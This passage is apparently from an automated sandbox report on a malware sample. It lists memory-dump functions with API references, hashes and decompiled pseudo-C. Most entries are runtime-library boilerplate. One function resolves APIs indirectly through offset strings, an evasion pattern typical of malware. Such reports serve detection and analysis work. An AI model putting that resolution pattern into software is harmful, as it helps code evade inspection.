                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • collate.LIBCPMT ref: 6E8F7087
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F709E
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F70BE
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F70CB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1767075461-0
                                                                                                                                  • Opcode ID: 55ef7c9dd6b6de0c4e6d0ac31c61b1e63597cc5dea8ff30398bdeb1729b69e24
                                                                                                                                  • Instruction ID: 264cdc5e337131cf339e9bbeb1742473a471e8911adbd283bd1e28088eed1f31
                                                                                                                                  • Opcode Fuzzy Hash: 55ef7c9dd6b6de0c4e6d0ac31c61b1e63597cc5dea8ff30398bdeb1729b69e24
                                                                                                                                  • Instruction Fuzzy Hash: 6D01C071900629CBDB01DBE8C954AEEB7B9AF85398F210D09D410AB2C0DF759A4B8B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F71FB, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7202
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F720C
                                                                                                                                  • int.LIBCPMT ref: 6E8F7223
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • ctype.LIBCPMT ref: 6E8F7246
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F725D
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F727D
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F728A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2958136301-0
                                                                                                                                  • Opcode ID: 1f127ce60920df6713edb1541b961e929026db84eb92eb12b029d0ae222fcbec
                                                                                                                                  • Instruction ID: e247fed4c3f7dca50aa7dbcf80a409e2c6dd58ccca5fd89bf62d336557d77251
                                                                                                                                  • Opcode Fuzzy Hash: 1f127ce60920df6713edb1541b961e929026db84eb92eb12b029d0ae222fcbec
                                                                                                                                  • Instruction Fuzzy Hash: 3401C03190061ACFDF01DBE8C954AED777ABF953A8F104D09E4116B2C0EFB49A4B8B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7166, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F716D
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7177
                                                                                                                                  • int.LIBCPMT ref: 6E8F718E
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • ctype.LIBCPMT ref: 6E8F71B1
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F71C8
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F71E8
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F71F5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2958136301-0
                                                                                                                                  • Opcode ID: 61883fc5aa5009a8ff41e77d5df48e72ef902dad1a2e25938c11b7e42595240e
                                                                                                                                  • Instruction ID: 66861b4c4daa53462445daf66dd568f8a41f57f35afe14351c776ccdc441471b
                                                                                                                                  • Opcode Fuzzy Hash: 61883fc5aa5009a8ff41e77d5df48e72ef902dad1a2e25938c11b7e42595240e
                                                                                                                                  • Instruction Fuzzy Hash: 30010031900619CBDF01DBE8C954AEDBBBAAF91398F114D09D4106B2C0DF709A4B8B80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A31A24, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A31A24(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0xa3d2a4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0xa3d294 = _t4;
					_t6 = GetCurrentProcessId();
					 *0xa3d290 = _t6;
					 *0xa3d29c = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0xa3d28c = _t7;
					if(_t7 == 0) {
						 *0xa3d28c =  *0xa3d28c | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                                                                                                                  0x00a31a2c
                                                                                                                                  0x00a31a32
                                                                                                                                  0x00a31a39
                                                                                                                                  0x00000000
                                                                                                                                  0x00a31a93
                                                                                                                                  0x00a31a3b
                                                                                                                                  0x00a31a43
                                                                                                                                  0x00a31a50
                                                                                                                                  0x00a31a50
                                                                                                                                  0x00a31a90
                                                                                                                                  0x00000000
                                                                                                                                  0x00a31a90
                                                                                                                                  0x00a31a52
                                                                                                                                  0x00a31a52
                                                                                                                                  0x00a31a57
                                                                                                                                  0x00a31a69
                                                                                                                                  0x00a31a6e
                                                                                                                                  0x00a31a74
                                                                                                                                  0x00a31a7a
                                                                                                                                  0x00a31a81
                                                                                                                                  0x00a31a83
                                                                                                                                  0x00a31a83
                                                                                                                                  0x00000000
                                                                                                                                  0x00a31a8a
                                                                                                                                  0x00a31a4c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a31a4e
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00A32669,?,?,00000001,?,?,?,00A31900,?), ref: 00A31A2C
                                                                                                                                  • GetVersion.KERNEL32(?,00000001,?,?,?,00A31900,?), ref: 00A31A3B
                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,00A31900,?), ref: 00A31A57
                                                                                                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,00A31900,?), ref: 00A31A74
                                                                                                                                  • GetLastError.KERNEL32(?,00000001,?,?,?,00A31900,?), ref: 00A31A93
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                                  • String ID: @MtNt
                                                                                                                                  • API String ID: 2270775618-3251738875
                                                                                                                                  • Opcode ID: 9ecf881ed83c2e3829bfce2845d6ecdb77b76d82afd00ab64748e8c990165549
                                                                                                                                  • Instruction ID: 82b7abb5693845ef8aae05448b5c434d259b6051908397c93f305545d71b8f00
                                                                                                                                  • Opcode Fuzzy Hash: 9ecf881ed83c2e3829bfce2845d6ecdb77b76d82afd00ab64748e8c990165549
                                                                                                                                  • Instruction Fuzzy Hash: ECF0AF70A46302EBD724CBF4AD0A76A3BA4E7057A2F104519F546DA1E0E770C443DF15
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A31A9C, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00A31AF6
                                                                                                                                  • SysAllocString.OLEAUT32(0070006F), ref: 00A31B0A
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00A31B1C
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00A31B84
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00A31B93
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00A31B9E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 344208780-0
                                                                                                                                  • Opcode ID: 52b07f76413980d28cefa56e4885abc06a664514c4928d872a44fdad2a7c5a0a
                                                                                                                                  • Instruction ID: 7f56a610fb085ffb270d019d048cda6f857908c3dc41c71d0dac1bfd189af9c4
                                                                                                                                  • Opcode Fuzzy Hash: 52b07f76413980d28cefa56e4885abc06a664514c4928d872a44fdad2a7c5a0a
                                                                                                                                  • Instruction Fuzzy Hash: FE415D36900609AFDB01DFF8DC45AAEB7B9EF89310F144466F910EB220EA719D06CB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A34837, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A34837(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00A375F6(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0xa3d2e0; // 0x296a5a8
					_t1 = _t23 + 0xa3e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0xa3d2e0; // 0x296a5a8
					_t2 = _t26 + 0xa3e782; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00A34AAB(_t54);
					} else {
						_t30 =  *0xa3d2e0; // 0x296a5a8
						_t5 = _t30 + 0xa3e76f; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0xa3d2e0; // 0x296a5a8
							_t7 = _t33 + 0xa3e4ce; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0xa3d2e0; // 0x296a5a8
								_t9 = _t36 + 0xa3e406; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0xa3d2e0; // 0x296a5a8
									_t11 = _t39 + 0xa3e792; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00A39269(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                                                                                                  0x00a34846
                                                                                                                                  0x00a3484a
                                                                                                                                  0x00a3490c
                                                                                                                                  0x00a34850
                                                                                                                                  0x00a34850
                                                                                                                                  0x00a34855
                                                                                                                                  0x00a34868
                                                                                                                                  0x00a3486a
                                                                                                                                  0x00a3486f
                                                                                                                                  0x00a34877
                                                                                                                                  0x00a3487e
                                                                                                                                  0x00a34880
                                                                                                                                  0x00a34885
                                                                                                                                  0x00a34904
                                                                                                                                  0x00a34905
                                                                                                                                  0x00a34887
                                                                                                                                  0x00a34887
                                                                                                                                  0x00a3488c
                                                                                                                                  0x00a34894
                                                                                                                                  0x00a34896
                                                                                                                                  0x00a3489b
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3489d
                                                                                                                                  0x00a3489d
                                                                                                                                  0x00a348a2
                                                                                                                                  0x00a348aa
                                                                                                                                  0x00a348ac
                                                                                                                                  0x00a348b1
                                                                                                                                  0x00000000
                                                                                                                                  0x00a348b3
                                                                                                                                  0x00a348b3
                                                                                                                                  0x00a348b8
                                                                                                                                  0x00a348c0
                                                                                                                                  0x00a348c2
                                                                                                                                  0x00a348c7
                                                                                                                                  0x00000000
                                                                                                                                  0x00a348c9
                                                                                                                                  0x00a348c9
                                                                                                                                  0x00a348ce
                                                                                                                                  0x00a348d6
                                                                                                                                  0x00a348d8
                                                                                                                                  0x00a348dd
                                                                                                                                  0x00000000
                                                                                                                                  0x00a348df
                                                                                                                                  0x00a348e5
                                                                                                                                  0x00a348ea
                                                                                                                                  0x00a348f1
                                                                                                                                  0x00a348f6
                                                                                                                                  0x00a348fb
                                                                                                                                  0x00000000
                                                                                                                                  0x00a348fd
                                                                                                                                  0x00a34900
                                                                                                                                  0x00a34900
                                                                                                                                  0x00a348fb
                                                                                                                                  0x00a348dd
                                                                                                                                  0x00a348c7
                                                                                                                                  0x00a348b1
                                                                                                                                  0x00a3489b
                                                                                                                                  0x00a34885
                                                                                                                                  0x00a3491a

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00A375F6: RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                  • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00A3101C,?,00000001,?,?,00000000,00000000), ref: 00A3485C
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,7243775A), ref: 00A3487E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,614D775A), ref: 00A34894
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00A348AA
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00A348C0
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00A348D6
                                                                                                                                    • Part of subcall function 00A39269: memset.NTDLL ref: 00A392E8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$AllocateHandleHeapModulememset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1886625739-0
                                                                                                                                  • Opcode ID: 80d105d6e148723b786a60187b9fa9300f6715ef927240a101bc1a21556f0cb6
                                                                                                                                  • Instruction ID: 072f51056e8eb1af60bc99aaceaf7292b521807b9bbca13324a57ca08abe41af
                                                                                                                                  • Opcode Fuzzy Hash: 80d105d6e148723b786a60187b9fa9300f6715ef927240a101bc1a21556f0cb6
                                                                                                                                  • Instruction Fuzzy Hash: 0621F7B150064AEFEB20DFA9DD44EABBBECEF18344B014466F545C7251E774EA06CB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8FE16B, Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 6E8FE172
                                                                                                                                  • _Maklocstr.LIBCPMT ref: 6E8FE1DB
                                                                                                                                  • _Maklocstr.LIBCPMT ref: 6E8FE1ED
                                                                                                                                  • _Maklocchr.LIBCPMT ref: 6E8FE205
                                                                                                                                  • _Maklocchr.LIBCPMT ref: 6E8FE215
                                                                                                                                  • _Getvals.LIBCPMT ref: 6E8FE237
                                                                                                                                    • Part of subcall function 6E8F688C: _Maklocchr.LIBCPMT ref: 6E8F68BB
                                                                                                                                    • Part of subcall function 6E8F688C: _Maklocchr.LIBCPMT ref: 6E8F68D1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3549167292-0
                                                                                                                                  • Opcode ID: 8600820448067cb0dd03198f472609bb8880dff0a8404b35a4a2e98b30a60a6a
                                                                                                                                  • Instruction ID: feea8bc94a24eab6035c6be7887af6534faf9f5e9c750b764e7b2cb37d91e825
                                                                                                                                  • Opcode Fuzzy Hash: 8600820448067cb0dd03198f472609bb8880dff0a8404b35a4a2e98b30a60a6a
                                                                                                                                  • Instruction Fuzzy Hash: 62216D71C00318EBDF149FE9D844ACE7BACAF04394F00895AB9149F281EB70D641CBE1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F74E4, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F74EB
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F74F5
                                                                                                                                  • int.LIBCPMT ref: 6E8F750C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7546
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7566
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7573
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 25fad046ceb2f7b5a008cadd37196c78755ddaeeb5d3a4833d2a29d63f13869d
                                                                                                                                  • Instruction ID: 34f9cb2eb7e1a53f49ae4d7b180456944fb66bd3ca719060b5c60e0a9faa813f
                                                                                                                                  • Opcode Fuzzy Hash: 25fad046ceb2f7b5a008cadd37196c78755ddaeeb5d3a4833d2a29d63f13869d
                                                                                                                                  • Instruction Fuzzy Hash: D701AD31900619DBCF01DFE8C9946ED77BABF893A8F104D09D4106B2D0DB749A4B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F1C01, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1C08
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1C12
                                                                                                                                  • int.LIBCPMT ref: 6E8F1C29
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1C63
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1C83
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1C90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 5a6457df432cc98f853bdf4401d9c4f0d01b87e6d92241c7b93ab68ebec466c9
                                                                                                                                  • Instruction ID: 687f0951bfd0439b76c408f6957bb9d76060093753be17834022809df6ba4f4d
                                                                                                                                  • Opcode Fuzzy Hash: 5a6457df432cc98f853bdf4401d9c4f0d01b87e6d92241c7b93ab68ebec466c9
                                                                                                                                  • Instruction Fuzzy Hash: 3001C071900629DBCF01DBE8C9946EE7BBAAF953A8F214D09D4106B2D0DF74994B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E90542D, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E905434
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E90543E
                                                                                                                                  • int.LIBCPMT ref: 6E905455
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E90548F
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E9054AF
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E9054BC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 2e3d9b5e614596478b2d58c0a03dd3d4266507f849a0fff731bdc97f97e7be01
                                                                                                                                  • Instruction ID: ab319acd7c58b8e86f78001e60258415b5bd8c7d68848f3722878d30224a8a3b
                                                                                                                                  • Opcode Fuzzy Hash: 2e3d9b5e614596478b2d58c0a03dd3d4266507f849a0fff731bdc97f97e7be01
                                                                                                                                  • Instruction Fuzzy Hash: 5401AD7190061ADBCF11DBE8C994AEDB7BAAF95368F500D0DE4106B390DB74DD468B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F744F, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7456
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7460
                                                                                                                                  • int.LIBCPMT ref: 6E8F7477
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F74B1
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F74D1
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F74DE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 69a908fb878165c8ffad0055af2bee8568e35e440cdc7bcd946674bd97c6edb6
                                                                                                                                  • Instruction ID: 2faab873dd4532f43786987a34caeb2c1b898982d612ab398ee881bbfa47b377
                                                                                                                                  • Opcode Fuzzy Hash: 69a908fb878165c8ffad0055af2bee8568e35e440cdc7bcd946674bd97c6edb6
                                                                                                                                  • Instruction Fuzzy Hash: 6E010031900629DBCF01DBE8C9546EE7B7ABF917A8F200C19E410BB2C0DF75994B8B80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7C75, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7C7C
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7C86
                                                                                                                                  • int.LIBCPMT ref: 6E8F7C9D
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7CD7
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7CF7
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7D04
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  • Opcode ID: 681e0eba1d5ddadcbc0d80fecb081a90cc4f3dd7994a56ac0c0bf4d3fe245d21
                                                                                                                                  • Instruction ID: 3b750ac5f0521b78b7964e6faffb0a07d4eedf327a077002df17b1faa24f84c4
                                                                                                                                  • Opcode Fuzzy Hash: 681e0eba1d5ddadcbc0d80fecb081a90cc4f3dd7994a56ac0c0bf4d3fe245d21
                                                                                                                                  • Instruction Fuzzy Hash: BB01D671900616DBCF01DBE8C554AED7B796F85398F110D09D8106B2C0DF749A4BCB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E9055EC, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E9055F3
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E9055FD
                                                                                                                                  • int.LIBCPMT ref: 6E905614
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E90564E
